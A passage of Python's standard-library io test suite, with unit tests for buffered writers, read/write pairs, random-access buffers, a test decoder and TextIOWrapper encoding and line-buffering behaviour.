writer = self.MockRawIO()
bufio = self.tp(writer, 8)
bufio.write(b"abc")
bufio.flush()
self.assertEqual(b"abc", writer._write_stack[0])
def test_writelines(self):
l = [b'ab', b'cd', b'ef']
writer = self.MockRawIO()
bufio = self.tp(writer, 8)
bufio.writelines(l)
bufio.flush()
self.assertEqual(b''.join(writer._write_stack), b'abcdef')
def test_writelines_userlist(self):
l = UserList([b'ab', b'cd', b'ef'])
writer = self.MockRawIO()
bufio = self.tp(writer, 8)
bufio.writelines(l)
bufio.flush()
self.assertEqual(b''.join(writer._write_stack), b'abcdef')
def test_writelines_error(self):
writer = self.MockRawIO()
bufio = self.tp(writer, 8)
self.assertRaises(TypeError, bufio.writelines, [1, 2, 3])
self.assertRaises(TypeError, bufio.writelines, None)
self.assertRaises(TypeError, bufio.writelines, 'abc')
def test_destructor(self):
writer = self.MockRawIO()
bufio = self.tp(writer, 8)
bufio.write(b"abc")
del bufio
support.gc_collect()
self.assertEqual(b"abc", writer._write_stack[0])
def test_truncate(self):
# Truncate implicitly flushes the buffer.
self.addCleanup(support.unlink, support.TESTFN)
with self.open(support.TESTFN, self.write_mode, buffering=0) as raw:
bufio = self.tp(raw, 8)
bufio.write(b"abcdef")
self.assertEqual(bufio.truncate(3), 3)
self.assertEqual(bufio.tell(), 6)
with self.open(support.TESTFN, "rb", buffering=0) as f:
self.assertEqual(f.read(), b"abc")
def test_truncate_after_write(self):
# Ensure that truncate preserves the file position after
# writes longer than the buffer size.
# Issue: https://bugs.python.org/issue32228
self.addCleanup(support.unlink, support.TESTFN)
with self.open(support.TESTFN, "wb") as f:
# Fill with some buffer
f.write(b'\x00' * 10000)
buffer_sizes = [8192, 4096, 200]
for buffer_size in buffer_sizes:
with self.open(support.TESTFN, "r+b", buffering=buffer_size) as f:
f.write(b'\x00' * (buffer_size + 1))
# After the write, write_pos and write_end are reset to 0
f.read(1)
# The read operation ensures that pos != raw_pos
f.truncate()
self.assertEqual(f.tell(), buffer_size + 2)
@support.requires_resource('cpu')
def test_threads(self):
try:
# Write out many bytes from many threads and test they were
# all flushed.
N = 1000
contents = bytes(range(256)) * N
sizes = cycle([1, 19])
n = 0
queue = deque()
while n < len(contents):
size = next(sizes)
queue.append(contents[n:n+size])
n += size
del contents
# We use a real file object because it allows us to
# exercise situations where the GIL is released before
# writing the buffer to the raw streams. This is in addition
# to concurrency issues due to switching threads in the middle
# of Python code.
with self.open(support.TESTFN, self.write_mode, buffering=0) as raw:
bufio = self.tp(raw, 8)
errors = []
def f():
try:
while True:
try:
s = queue.popleft()
except IndexError:
return
bufio.write(s)
except Exception as e:
errors.append(e)
raise
threads = [threading.Thread(target=f) for x in range(20)]
with support.start_threads(threads):
time.sleep(0.02) # yield
self.assertFalse(errors,
"the following exceptions were caught: %r" % errors)
bufio.close()
with self.open(support.TESTFN, "rb") as f:
s = f.read()
for i in range(256):
self.assertEqual(s.count(bytes([i])), N)
finally:
support.unlink(support.TESTFN)
def test_misbehaved_io(self):
rawio = self.MisbehavedRawIO()
bufio = self.tp(rawio, 5)
self.assertRaises(OSError, bufio.seek, 0)
self.assertRaises(OSError, bufio.tell)
self.assertRaises(OSError, bufio.write, b"abcdef")
# Silence destructor error
bufio.close = lambda: None
def test_max_buffer_size_removal(self):
with self.assertRaises(TypeError):
self.tp(self.MockRawIO(), 8, 12)
def test_write_error_on_close(self):
raw = self.MockRawIO()
def bad_write(b):
raise OSError()
raw.write = bad_write
b = self.tp(raw)
b.write(b'spam')
self.assertRaises(OSError, b.close) # exception not swallowed
self.assertTrue(b.closed)
def test_slow_close_from_thread(self):
# Issue #31976
rawio = self.SlowFlushRawIO()
bufio = self.tp(rawio, 8)
t = threading.Thread(target=bufio.close)
t.start()
rawio.in_flush.wait()
self.assertRaises(ValueError, bufio.write, b'spam')
self.assertTrue(bufio.closed)
t.join()
class CBufferedWriterTest(BufferedWriterTest, SizeofTest):
tp = io.BufferedWriter
@unittest.skipIf(MEMORY_SANITIZER or ADDRESS_SANITIZER, "sanitizer defaults to crashing "
"instead of returning NULL for malloc failure.")
def test_constructor(self):
BufferedWriterTest.test_constructor(self)
# The allocation can succeed on 32-bit builds, e.g. with more
# than 2 GiB RAM and a 64-bit kernel.
if sys.maxsize > 0x7FFFFFFF:
rawio = self.MockRawIO()
bufio = self.tp(rawio)
self.assertRaises((OverflowError, MemoryError, ValueError),
bufio.__init__, rawio, sys.maxsize)
def test_initialization(self):
rawio = self.MockRawIO()
bufio = self.tp(rawio)
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=0)
self.assertRaises(ValueError, bufio.write, b"def")
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=-16)
self.assertRaises(ValueError, bufio.write, b"def")
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=-1)
self.assertRaises(ValueError, bufio.write, b"def")
def test_garbage_collection(self):
# C BufferedWriter objects are collected, and collecting them flushes
# all data to disk.
# The Python version has __del__, so it ends up in gc.garbage instead
self.addCleanup(support.unlink, support.TESTFN)
with support.check_warnings(('', ResourceWarning)):
rawio = self.FileIO(support.TESTFN, "w+b")
f = self.tp(rawio)
f.write(b"123xxx")
f.x = f
wr = weakref.ref(f)
del f
support.gc_collect()
self.assertIsNone(wr(), wr)
with self.open(support.TESTFN, "rb") as f:
self.assertEqual(f.read(), b"123xxx")
def test_args_error(self):
# Issue #17275
with self.assertRaisesRegex(TypeError, "BufferedWriter"):
self.tp(io.BytesIO(), 1024, 1024, 1024)
class PyBufferedWriterTest(BufferedWriterTest):
tp = pyio.BufferedWriter
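# Tests for BufferedRWPair, which wraps two independent raw streams (one readable,
# one writable) behind a single buffered interface.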
class BufferedRWPairTest(unittest.TestCase):
def test_constructor(self):
pair = self.tp(self.MockRawIO(), self.MockRawIO())
self.assertFalse(pair.closed)
def test_uninitialized(self):
pair = self.tp.__new__(self.tp)
del pair
pair = self.tp.__new__(self.tp)
self.assertRaisesRegex((ValueError, AttributeError),
'uninitialized|has no attribute',
pair.read, 0)
self.assertRaisesRegex((ValueError, AttributeError),
'uninitialized|has no attribute',
pair.write, b'')
pair.__init__(self.MockRawIO(), self.MockRawIO())
self.assertEqual(pair.read(0), b'')
self.assertEqual(pair.write(b''), 0)
def test_detach(self):
pair = self.tp(self.MockRawIO(), self.MockRawIO())
self.assertRaises(self.UnsupportedOperation, pair.detach)
def test_constructor_max_buffer_size_removal(self):
with self.assertRaises(TypeError):
self.tp(self.MockRawIO(), self.MockRawIO(), 8, 12)
def test_constructor_with_not_readable(self):
class NotReadable(MockRawIO):
def readable(self):
return False
self.assertRaises(OSError, self.tp, NotReadable(), self.MockRawIO())
def test_constructor_with_not_writeable(self):
class NotWriteable(MockRawIO):
def writable(self):
return False
self.assertRaises(OSError, self.tp, self.MockRawIO(), NotWriteable())
def test_read(self):
pair = self.tp(self.BytesIO(b"abcdef"), self.MockRawIO())
self.assertEqual(pair.read(3), b"abc")
self.assertEqual(pair.read(1), b"d")
self.assertEqual(pair.read(), b"ef")
pair = self.tp(self.BytesIO(b"abc"), self.MockRawIO())
self.assertEqual(pair.read(None), b"abc")
def test_readlines(self):
pair = lambda: self.tp(self.BytesIO(b"abc\ndef\nh"), self.MockRawIO())
self.assertEqual(pair().readlines(), [b"abc\n", b"def\n", b"h"])
self.assertEqual(pair().readlines(), [b"abc\n", b"def\n", b"h"])
self.assertEqual(pair().readlines(5), [b"abc\n", b"def\n"])
def test_read1(self):
# .read1() is delegated to the underlying reader object, so this test
# can be shallow.
pair = self.tp(self.BytesIO(b"abcdef"), self.MockRawIO())
self.assertEqual(pair.read1(3), b"abc")
self.assertEqual(pair.read1(), b"def")
def test_readinto(self):
for method in ("readinto", "readinto1"):
with self.subTest(method):
pair = self.tp(self.BytesIO(b"abcdef"), self.MockRawIO())
data = byteslike(b'\0' * 5)
self.assertEqual(getattr(pair, method)(data), 5)
self.assertEqual(bytes(data), b"abcde")
def test_write(self):
w = self.MockRawIO()
pair = self.tp(self.MockRawIO(), w)
pair.write(b"abc")
pair.flush()
buffer = bytearray(b"def")
pair.write(buffer)
buffer[:] = b"***" # Overwrite our copy of the data
pair.flush()
self.assertEqual(w._write_stack, [b"abc", b"def"])
def test_peek(self):
pair = self.tp(self.BytesIO(b"abcdef"), self.MockRawIO())
self.assertTrue(pair.peek(3).startswith(b"abc"))
self.assertEqual(pair.read(3), b"abc")
def test_readable(self):
pair = self.tp(self.MockRawIO(), self.MockRawIO())
self.assertTrue(pair.readable())
def test_writeable(self):
pair = self.tp(self.MockRawIO(), self.MockRawIO())
self.assertTrue(pair.writable())
def test_seekable(self):
# BufferedRWPairs are never seekable, even if their readers and writers
# are.
pair = self.tp(self.MockRawIO(), self.MockRawIO())
self.assertFalse(pair.seekable())
# .flush() is delegated to the underlying writer object and has been
# tested in the test_write method.
def test_close_and_closed(self):
pair = self.tp(self.MockRawIO(), self.MockRawIO())
self.assertFalse(pair.closed)
pair.close()
self.assertTrue(pair.closed)
def test_reader_close_error_on_close(self):
def reader_close():
reader_non_existing
reader = self.MockRawIO()
reader.close = reader_close
writer = self.MockRawIO()
pair = self.tp(reader, writer)
with self.assertRaises(NameError) as err:
pair.close()
self.assertIn('reader_non_existing', str(err.exception))
self.assertTrue(pair.closed)
self.assertFalse(reader.closed)
self.assertTrue(writer.closed)
# Silence destructor error
reader.close = lambda: None
def test_writer_close_error_on_close(self):
def writer_close():
writer_non_existing
reader = self.MockRawIO()
writer = self.MockRawIO()
writer.close = writer_close
pair = self.tp(reader, writer)
with self.assertRaises(NameError) as err:
pair.close()
self.assertIn('writer_non_existing', str(err.exception))
self.assertFalse(pair.closed)
self.assertTrue(reader.closed)
self.assertFalse(writer.closed)
# Silence destructor error
writer.close = lambda: None
writer = None
# Ignore BufferedWriter (of the BufferedRWPair) unraisable exception
with support.catch_unraisable_exception():
# Ignore BufferedRWPair unraisable exception
with support.catch_unraisable_exception():
pair = None
support.gc_collect()
support.gc_collect()
def test_reader_writer_close_error_on_close(self):
def reader_close():
reader_non_existing
def writer_close():
writer_non_existing
reader = self.MockRawIO()
reader.close = reader_close
writer = self.MockRawIO()
writer.close = writer_close
pair = self.tp(reader, writer)
with self.assertRaises(NameError) as err:
pair.close()
self.assertIn('reader_non_existing', str(err.exception))
self.assertIsInstance(err.exception.__context__, NameError)
self.assertIn('writer_non_existing', str(err.exception.__context__))
self.assertFalse(pair.closed)
self.assertFalse(reader.closed)
self.assertFalse(writer.closed)
# Silence destructor error
reader.close = lambda: None
writer.close = lambda: None
with support.catch_unraisable_exception():
# Ignore BufferedRWPair unraisable exception
pair = None
support.gc_collect()
def test_isatty(self):
class SelectableIsAtty(MockRawIO):
def __init__(self, isatty):
MockRawIO.__init__(self)
self._isatty = isatty
def isatty(self):
return self._isatty
pair = self.tp(SelectableIsAtty(False), SelectableIsAtty(False))
self.assertFalse(pair.isatty())
pair = self.tp(SelectableIsAtty(True), SelectableIsAtty(False))
self.assertTrue(pair.isatty())
pair = self.tp(SelectableIsAtty(False), SelectableIsAtty(True))
self.assertTrue(pair.isatty())
pair = self.tp(SelectableIsAtty(True), SelectableIsAtty(True))
self.assertTrue(pair.isatty())
def test_weakref_clearing(self):
brw = self.tp(self.MockRawIO(), self.MockRawIO())
ref = weakref.ref(brw)
brw = None
ref = None # Shouldn't segfault.
class CBufferedRWPairTest(BufferedRWPairTest):
tp = io.BufferedRWPair
class PyBufferedRWPairTest(BufferedRWPairTest):
tp = pyio.BufferedRWPair
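# BufferedRandom must pass both the reader and writer suites, plus the interleaved
# read/write and seek cases below.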
class BufferedRandomTest(BufferedReaderTest, BufferedWriterTest):
read_mode = "rb+"
write_mode = "wb+"
def test_constructor(self):
BufferedReaderTest.test_constructor(self)
BufferedWriterTest.test_constructor(self)
def test_uninitialized(self):
BufferedReaderTest.test_uninitialized(self)
BufferedWriterTest.test_uninitialized(self)
def test_read_and_write(self):
raw = self.MockRawIO((b"asdf", b"ghjk"))
rw = self.tp(raw, 8)
self.assertEqual(b"as", rw.read(2))
rw.write(b"ddd")
rw.write(b"eee")
self.assertFalse(raw._write_stack) # Buffer writes
self.assertEqual(b"ghjk", rw.read())
self.assertEqual(b"dddeee", raw._write_stack[0])
def test_seek_and_tell(self):
raw = self.BytesIO(b"asdfghjkl")
rw = self.tp(raw)
self.assertEqual(b"as", rw.read(2))
self.assertEqual(2, rw.tell())
rw.seek(0, 0)
self.assertEqual(b"asdf", rw.read(4))
rw.write(b"123f")
rw.seek(0, 0)
self.assertEqual(b"asdf123fl", rw.read())
self.assertEqual(9, rw.tell())
rw.seek(-4, 2)
self.assertEqual(5, rw.tell())
rw.seek(2, 1)
self.assertEqual(7, rw.tell())
self.assertEqual(b"fl", rw.read(11))
rw.flush()
self.assertEqual(b"asdf123fl", raw.getvalue())
self.assertRaises(TypeError, rw.seek, 0.0)
def check_flush_and_read(self, read_func):
raw = self.BytesIO(b"abcdefghi")
bufio = self.tp(raw)
self.assertEqual(b"ab", read_func(bufio, 2))
bufio.write(b"12")
self.assertEqual(b"ef", read_func(bufio, 2))
self.assertEqual(6, bufio.tell())
bufio.flush()
self.assertEqual(6, bufio.tell())
self.assertEqual(b"ghi", read_func(bufio))
raw.seek(0, 0)
raw.write(b"XYZ")
# flush() resets the read buffer
bufio.flush()
bufio.seek(0, 0)
self.assertEqual(b"XYZ", read_func(bufio, 3))
def test_flush_and_read(self):
self.check_flush_and_read(lambda bufio, *args: bufio.read(*args))
def test_flush_and_readinto(self):
def _readinto(bufio, n=-1):
b = bytearray(n if n >= 0 else 9999)
n = bufio.readinto(b)
return bytes(b[:n])
self.check_flush_and_read(_readinto)
def test_flush_and_peek(self):
def _peek(bufio, n=-1):
# This relies on the fact that the buffer can contain the whole
# raw stream, otherwise peek() can return less.
b = bufio.peek(n)
if n != -1:
b = b[:n]
bufio.seek(len(b), 1)
return b
self.check_flush_and_read(_peek)
def test_flush_and_write(self):
raw = self.BytesIO(b"abcdefghi")
bufio = self.tp(raw)
bufio.write(b"123")
bufio.flush()
bufio.write(b"45")
bufio.flush()
bufio.seek(0, 0)
self.assertEqual(b"12345fghi", raw.getvalue())
self.assertEqual(b"12345fghi", bufio.read())
def test_threads(self):
BufferedReaderTest.test_threads(self)
BufferedWriterTest.test_threads(self)
def test_writes_and_peek(self):
def _peek(bufio):
bufio.peek(1)
self.check_writes(_peek)
def _peek(bufio):
pos = bufio.tell()
bufio.seek(-1, 1)
bufio.peek(1)
bufio.seek(pos, 0)
self.check_writes(_peek)
def test_writes_and_reads(self):
def _read(bufio):
bufio.seek(-1, 1)
bufio.read(1)
self.check_writes(_read)
def test_writes_and_read1s(self):
def _read1(bufio):
bufio.seek(-1, 1)
bufio.read1(1)
self.check_writes(_read1)
def test_writes_and_readintos(self):
def _read(bufio):
bufio.seek(-1, 1)
bufio.readinto(bytearray(1))
self.check_writes(_read)
def test_write_after_readahead(self):
# Issue #6629: writing after the buffer was filled by readahead should
# first rewind the raw stream.
for overwrite_size in [1, 5]:
raw = self.BytesIO(b"A" * 10)
bufio = self.tp(raw, 4)
# Trigger readahead
self.assertEqual(bufio.read(1), b"A")
self.assertEqual(bufio.tell(), 1)
            # Overwriting should rewind the raw stream if needed
bufio.write(b"B" * overwrite_size)
self.assertEqual(bufio.tell(), overwrite_size + 1)
# If the write size was smaller than the buffer size, flush() and
# check that rewind happens.
bufio.flush()
self.assertEqual(bufio.tell(), overwrite_size + 1)
s = raw.getvalue()
self.assertEqual(s,
b"A" + b"B" * overwrite_size + b"A" * (9 - overwrite_size))
def test_write_rewind_write(self):
# Various combinations of reading / writing / seeking backwards / writing again
def mutate(bufio, pos1, pos2):
assert pos2 >= pos1
# Fill the buffer
bufio.seek(pos1)
bufio.read(pos2 - pos1)
bufio.write(b'\x02')
# This writes earlier than the previous write, but still inside
# the buffer.
bufio.seek(pos1)
bufio.write(b'\x01')
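        # Exercise every (i, j) pair over a 5-byte stream; after flushing,
        # byte j should be 0x02 and byte i should be 0x01 (the later 0x01
        # wins when i == j).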
b = b"\x80\x81\x82\x83\x84"
for i in range(0, len(b)):
for j in range(i, len(b)):
raw = self.BytesIO(b)
bufio = self.tp(raw, 100)
mutate(bufio, i, j)
bufio.flush()
expected = bytearray(b)
expected[j] = 2
expected[i] = 1
self.assertEqual(raw.getvalue(), expected,
"failed result for i=%d, j=%d" % (i, j))
def test_truncate_after_read_or_write(self):
raw = self.BytesIO(b"A" * 10)
bufio = self.tp(raw, 100)
self.assertEqual(bufio.read(2), b"AA") # the read buffer gets filled
self.assertEqual(bufio.truncate(), 2)
self.assertEqual(bufio.write(b"BB"), 2) # the write buffer increases
self.assertEqual(bufio.truncate(), 4)
def test_misbehaved_io(self):
BufferedReaderTest.test_misbehaved_io(self)
BufferedWriterTest.test_misbehaved_io(self)
def test_interleaved_read_write(self):
# Test for issue #12213
with self.BytesIO(b'abcdefgh') as raw:
with self.tp(raw, 100) as f:
f.write(b"1")
self.assertEqual(f.read(1), b'b')
f.write(b'2')
self.assertEqual(f.read1(1), b'd')
f.write(b'3')
buf = bytearray(1)
f.readinto(buf)
self.assertEqual(buf, b'f')
f.write(b'4')
self.assertEqual(f.peek(1), b'h')
f.flush()
self.assertEqual(raw.getvalue(), b'1b2d3f4h')
with self.BytesIO(b'abc') as raw:
with self.tp(raw, 100) as f:
self.assertEqual(f.read(1), b'a')
f.write(b"2")
self.assertEqual(f.read(1), b'c')
f.flush()
self.assertEqual(raw.getvalue(), b'a2c')
def test_interleaved_readline_write(self):
with self.BytesIO(b'ab\ncdef\ng\n') as raw:
with self.tp(raw) as f:
f.write(b'1')
self.assertEqual(f.readline(), b'b\n')
f.write(b'2')
self.assertEqual(f.readline(), b'def\n')
f.write(b'3')
self.assertEqual(f.readline(), b'\n')
f.flush()
self.assertEqual(raw.getvalue(), b'1b\n2def\n3\n')
# You can't construct a BufferedRandom over a non-seekable stream.
test_unseekable = None
# writable() returns True, so there's no point to test it over
# a writable stream.
test_truncate_on_read_only = None
class CBufferedRandomTest(BufferedRandomTest, SizeofTest):
tp = io.BufferedRandom
@unittest.skipIf(MEMORY_SANITIZER or ADDRESS_SANITIZER, "sanitizer defaults to crashing "
"instead of returning NULL for malloc failure.")
def test_constructor(self):
BufferedRandomTest.test_constructor(self)
# The allocation can succeed on 32-bit builds, e.g. with more
# than 2 GiB RAM and a 64-bit kernel.
if sys.maxsize > 0x7FFFFFFF:
rawio = self.MockRawIO()
bufio = self.tp(rawio)
self.assertRaises((OverflowError, MemoryError, ValueError),
bufio.__init__, rawio, sys.maxsize)
def test_garbage_collection(self):
CBufferedReaderTest.test_garbage_collection(self)
CBufferedWriterTest.test_garbage_collection(self)
def test_args_error(self):
# Issue #17275
with self.assertRaisesRegex(TypeError, "BufferedRandom"):
self.tp(io.BytesIO(), 1024, 1024, 1024)
class PyBufferedRandomTest(BufferedRandomTest):
tp = pyio.BufferedRandom
# To fully exercise seek/tell, the StatefulIncrementalDecoder has these
# properties:
# - A single output character can correspond to many bytes of input.
# - The number of input bytes to complete the character can be
# undetermined until the last input byte is received.
# - The number of input bytes can vary depending on previous input.
# - A single input byte can correspond to many characters of output.
# - The number of output characters can be undetermined until the
# last input byte is received.
# - The number of output characters can vary depending on previous input.
class StatefulIncrementalDecoder(codecs.IncrementalDecoder):
"""
For testing seek/tell behavior with a stateful, buffering decoder.
Input is a sequence of words. Words may be fixed-length (length set
by input) or variable-length (period-terminated). In variable-length
mode, extra periods are ignored. Possible words are:
- 'i' followed by a number sets the input length, I (maximum 99).
        When I is set to 0, words are variable-length (period-terminated).
- 'o' followed by a number sets the output length, O (maximum 99).
- Any other word is converted into a word followed by a period on
the output. The output word consists of the input word truncated
or padded out with hyphens to make its length equal to O. If O
is 0, the word is output verbatim without truncating or padding.
I and O are initially set to 1. When I changes, any buffered input is
re-scanned according to the new I. EOF also terminates the last word.
"""
def __init__(self, errors='strict'):
codecs.IncrementalDecoder.__init__(self, errors)
self.reset()
def __repr__(self):
return '<SID %x>' % id(self)
def reset(self):
self.i = 1
self.o = 1
self.buffer = bytearray()
def getstate(self):
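        # State is (pending bytes, flags); flags packs the lengths as
        # (i ^ 1) * 100 + (o ^ 1), so a freshly reset decoder has flags == 0.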
i, o = self.i ^ 1, self.o ^ 1 # so that flags = 0 after reset()
return bytes(self.buffer), i*100 + o
def setstate(self, state):
buffer, io = state
self.buffer = bytearray(buffer)
i, o = divmod(io, 100)
self.i, self.o = i ^ 1, o ^ 1
def decode(self, input, final=False):
output = ''
for b in input:
if self.i == 0: # variable-length, terminated with period
if b == ord('.'):
if self.buffer:
output += self.process_word()
else:
self.buffer.append(b)
else: # fixed-length, terminate after self.i bytes
self.buffer.append(b)
if len(self.buffer) == self.i:
output += self.process_word()
if final and self.buffer: # EOF terminates the last word
output += self.process_word()
return output
def process_word(self):
output = ''
if self.buffer[0] == ord('i'):
self.i = min(99, int(self.buffer[1:] or 0)) # set input length
elif self.buffer[0] == ord('o'):
self.o = min(99, int(self.buffer[1:] or 0)) # set output length
else:
output = self.buffer.decode('ascii')
if len(output) < self.o:
output += '-'*self.o # pad out with hyphens
if self.o:
output = output[:self.o] # truncate to output length
output += '.'
self.buffer = bytearray()
return output
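    # Class-level switch checked by lookupTestDecoder() below: tests temporarily
    # set it to True so the codec name 'test_decoder' resolves to this decoder.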
codecEnabled = False
@classmethod
def lookupTestDecoder(cls, name):
if cls.codecEnabled and name == 'test_decoder':
latin1 = codecs.lookup('latin-1')
return codecs.CodecInfo(
name='test_decoder', encode=latin1.encode, decode=None,
incrementalencoder=None,
streamreader=None, streamwriter=None,
incrementaldecoder=cls)
# Register the decoder defined above for testing.
# It is disabled by default; tests enable it as needed.
codecs.register(StatefulIncrementalDecoder.lookupTestDecoder)
class StatefulIncrementalDecoderTest(unittest.TestCase):
"""
Make sure the StatefulIncrementalDecoder actually works.
"""
test_cases = [
# I=1, O=1 (fixed-length input == fixed-length output)
(b'abcd', False, 'a.b.c.d.'),
# I=0, O=0 (variable-length input, variable-length output)
(b'oiabcd', True, 'abcd.'),
# I=0, O=0 (should ignore extra periods)
(b'oi...abcd...', True, 'abcd.'),
# I=0, O=6 (variable-length input, fixed-length output)
(b'i.o6.x.xyz.toolongtofit.', False, 'x-----.xyz---.toolon.'),
# I=2, O=6 (fixed-length input < fixed-length output)
(b'i.i2.o6xyz', True, 'xy----.z-----.'),
# I=6, O=3 (fixed-length input > fixed-length output)
(b'i.o3.i6.abcdefghijklmnop', True, 'abc.ghi.mno.'),
# I=0, then 3; O=29, then 15 (with longer output)
(b'i.o29.a.b.cde.o15.abcdefghijabcdefghij.i3.a.b.c.d.ei00k.l.m', True,
'a----------------------------.' +
'b----------------------------.' +
'cde--------------------------.' +
'abcdefghijabcde.' +
'a.b------------.' +
'.c.------------.' +
'd.e------------.' +
'k--------------.' +
'l--------------.' +
'm--------------.')
]
def test_decoder(self):
# Try a few one-shot test cases.
for input, eof, output in self.test_cases:
d = StatefulIncrementalDecoder()
self.assertEqual(d.decode(input, eof), output)
# Also test an unfinished decode, followed by forcing EOF.
d = StatefulIncrementalDecoder()
self.assertEqual(d.decode(b'oiabcd'), '')
self.assertEqual(d.decode(b'', 1), 'abcd.')
class TextIOWrapperTest(unittest.TestCase):
def setUp(self):
self.testdata = b"AAA\r\nBBB\rCCC\r\nDDD\nEEE\r\n"
self.normalized = b"AAA\nBBB\nCCC\nDDD\nEEE\n".decode("ascii")
support.unlink(support.TESTFN)
def tearDown(self):
support.unlink(support.TESTFN)
def test_constructor(self):
r = self.BytesIO(b"\xc3\xa9\n\n")
b = self.BufferedReader(r, 1000)
t = self.TextIOWrapper(b)
t.__init__(b, encoding="latin-1", newline="\r\n")
self.assertEqual(t.encoding, "latin-1")
self.assertEqual(t.line_buffering, False)
t.__init__(b, encoding="utf-8", line_buffering=True)
self.assertEqual(t.encoding, "utf-8")
self.assertEqual(t.line_buffering, True)
self.assertEqual("\xe9\n", t.readline())
self.assertRaises(TypeError, t.__init__, b, newline=42)
self.assertRaises(ValueError, t.__init__, b, newline='xyzzy')
def test_uninitialized(self):
t = self.TextIOWrapper.__new__(self.TextIOWrapper)
del t
t = self.TextIOWrapper.__new__(self.TextIOWrapper)
self.assertRaises(Exception, repr, t)
self.assertRaisesRegex((ValueError, AttributeError),
'uninitialized|has no attribute',
t.read, 0)
t.__init__(self.MockRawIO())
self.assertEqual(t.read(0), '')
def test_non_text_encoding_codecs_are_rejected(self):
# Ensure the constructor complains if passed a codec that isn't
# marked as a text encoding
# http://bugs.python.org/issue20404
r = self.BytesIO()
b = self.BufferedWriter(r)
with self.assertRaisesRegex(LookupError, "is not a text encoding"):
self.TextIOWrapper(b, encoding="hex")
def test_detach(self):
r = self.BytesIO()
b = self.BufferedWriter(r)
t = self.TextIOWrapper(b)
self.assertIs(t.detach(), b)
t = self.TextIOWrapper(b, encoding="ascii")
t.write("howdy")
self.assertFalse(r.getvalue())
t.detach()
self.assertEqual(r.getvalue(), b"howdy")
self.assertRaises(ValueError, t.detach)
# Operations independent of the detached stream should still work
repr(t)
self.assertEqual(t.encoding, "ascii")
self.assertEqual(t.errors, "strict")
self.assertFalse(t.line_buffering)
self.assertFalse(t.write_through)
def test_repr(self):
raw = self.BytesIO("hello".encode("utf-8"))
b = self.BufferedReader(raw)
t = self.TextIOWrapper(b, encoding="utf-8")
modname = self.TextIOWrapper.__module__
self.assertRegex(repr(t),
r"<(%s\.)?TextIOWrapper encoding='utf-8'>" % modname)
raw.name = "dummy"
self.assertRegex(repr(t),
r"<(%s\.)?TextIOWrapper name='dummy' encoding='utf-8'>" % modname)
t.mode = "r"
self.assertRegex(repr(t),
r"<(%s\.)?TextIOWrapper name='dummy' mode='r' encoding='utf-8'>" % modname)
raw.name = b"dummy"
self.assertRegex(repr(t),
r"<(%s\.)?TextIOWrapper name=b'dummy' mode='r' encoding='utf-8'>" % modname)
t.buffer.detach()
repr(t) # Should not raise an exception
def test_recursive_repr(self):
# Issue #25455
raw = self.BytesIO()
t = self.TextIOWrapper(raw)
with support.swap_attr(raw, 'name', t):
try:
repr(t) # Should not crash
except RuntimeError:
pass
def test_line_buffering(self):
r = self.BytesIO()
b = self.BufferedWriter(r, 1000)
t = self.TextIOWrapper(b, newline="\n", line_buffering=True)
t.write("X")
self.assertEqual(r.getvalue(), b"") # No flush happened
t.write("Y\nZ")
self.assertEqual(r.getvalue(), b"XY\nZ") # All got flushed
t.write("A\rB")
self.assertEqual(r.getvalue(), b"XY\nZA\rB")
def test_reconfigure_line_buffering(self):
r = self.BytesIO()
b = self.BufferedWriter(r, 1000)
t = self.TextIOWrapper(b, newline="\n", line_buffering=False)
t.write("AB\nC")
self.assertEqual(r.getvalue(), b"")
t.reconfigure(line_buffering=True) # implicit flush
self.assertEqual(r.getvalue(), b"AB\nC")
t.write("DEF\nG")
self.assertEqual(r.getvalue(), b"AB\nCDEF\nG")
t.write("H")
self.assertEqual(r.getvalue(), b"AB\nCDEF\nG")
t.reconfigure(line_buffering=False) # implicit flush
self.assertEqual(r.getvalue(), b"AB\nCDEF\nGH")
t.write("IJ")
self.assertEqual(r.getvalue(), b"AB\nCDEF\nGH")
# Keeping default value
t.reconfigure()
t.reconfigure(line_buffering=None)
self.assertEqual(t.line_buffering, False)
t.reconfigure(line_buffering=True)
t.reconfigure()
t.reconfigure(line_buffering=None)
self.assertEqual(t.line_buffering, True)
@unittest.skipIf(sys.flags.utf8_mode, "utf-8 mode is enabled")
def test_default_encoding(self):
old_environ = dict(os.environ)
try:
            # try to get a user preferred encoding different from the current
# locale encoding to check that TextIOWrapper() uses the current
# locale encoding and not the user preferred encoding
for key in ('LC_ALL', 'LANG', 'LC_CTYPE'):
if key in os.environ:
del os.environ[key]
current_locale_encoding = locale.getpreferredencoding(False)
b = self.BytesIO()
t = self.TextIOWrapper(b)
self.assertEqual(t.encoding, current_locale_encoding)
finally:
os.environ.clear()
os.environ.update(old_environ)
@support.cpython_only
@unittest.skipIf(sys.flags.utf8_mode, "utf-8 mode is enabled")
def test_device_encoding(self):
# Issue 15989
import _testcapi
b = self.BytesIO()
b.fileno = lambda: _testcapi.INT_MAX + 1
self.assertRaises(OverflowError, self.TextIOWrapper, b)
b.fileno = lambda: _testcapi.UINT_MAX + 1
self.assertRaises(OverflowError, self.TextIOWrapper, b)
def test_encoding(self):
# Check the encoding attribute is always set, and valid
b = self.BytesIO()
t = self.TextIOWrapper(b, encoding="utf-8")
self.assertEqual(t.encoding, "utf-8")
t = self.TextIOWrapper(b)
self.assertIsNotNone(t.encoding)
codecs.lookup(t.encoding)
def test_encoding_errors_reading(self):
# (1) default
b = self.BytesIO(b"abc\n\xff\n")
t = self.TextIOWrapper(b, encoding="ascii")
self.assertRaises(UnicodeError, t.read)
# (2) explicit strict
b = self.BytesIO(b"abc\n\xff\n")
t = self.TextIOWrapper(b, encoding="ascii", errors="strict")
self.assertRaises(UnicodeError, t.read)
# (3) ignore
b = self.BytesIO(b"abc\n\xff\n")
t = self.TextIOWrapper(b, encoding="ascii", errors="ignore")
self.assertEqual(t.read(), "abc\n\n")
# (4) replace
b = self.BytesIO(b"abc\n\xff\n")
t = self.TextIOWrapper(b, encoding="ascii", errors="replace")
self.assertEqual(t.read(), "abc\n\ufffd\n")
def test_encoding_errors_writing(self):
# (1) default
b = self.BytesIO()
t = self.TextIOWrapper(b, encoding="ascii")
self.assertRaises(UnicodeError, t.write, "\xff")
# (2) explicit strict
b = self.BytesIO()
t = self.TextIOWrapper(b, encoding="ascii", errors="strict")
self.assertRaises(UnicodeError, t.write, "\xff")
# (3) ignore
b = self.BytesIO()
t = self.TextIOWrapper(b, encoding="ascii", errors="ignore",
newline="\n")
t.write("abc\xffdef\n")
t.flush()
